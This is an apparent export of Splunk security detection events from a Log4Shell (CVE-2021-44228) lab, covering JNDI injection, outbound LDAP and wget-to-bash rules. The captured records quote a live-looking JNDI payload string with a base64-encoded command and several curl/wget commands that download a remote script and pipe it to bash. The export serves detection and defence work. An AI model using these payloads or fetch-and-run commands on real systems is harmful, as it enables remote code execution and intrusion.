annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642642151, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 16", annotations._all="Source:Application Log", annotations._all="CVE-2021-44228", annotations._all="DE.CM", annotations._all="CIS 3", annotations._all="Exploitation", annotations._all="Stage:Execution", annotations._all="CIS 5", annotations._all="Reconnaissance", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", 
annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. 
If you see results for this detection, it means that there was an attempt at an injection, which could be a reconnaissance activity or a valid exploitation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642642153, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="PR.PT", annotations._all="T1190", annotations._all="Command and Control", annotations._all="CIS 12", annotations._all="DE.AE", annotations._all="Source:Endpoint", annotations._all="CIS 13", annotations._all="Stage:Initial Access", annotations._all="DE.CM", annotations._all="T1059", annotations._all="CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="Log4Shell CVE-2021-44228", annotations._all="PR.DS", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642642151, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 16", annotations._all="Source:Application Log", annotations._all="CVE-2021-44228", annotations._all="DE.CM", annotations._all="CIS 3", annotations._all="Exploitation", annotations._all="Stage:Execution", annotations._all="CIS 5", annotations._all="Reconnaissance", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", 
annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. 
In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was an attempt at an injection, which could be a reconnaissance activity or a valid exploitation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote 
file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An 
instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", 
annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
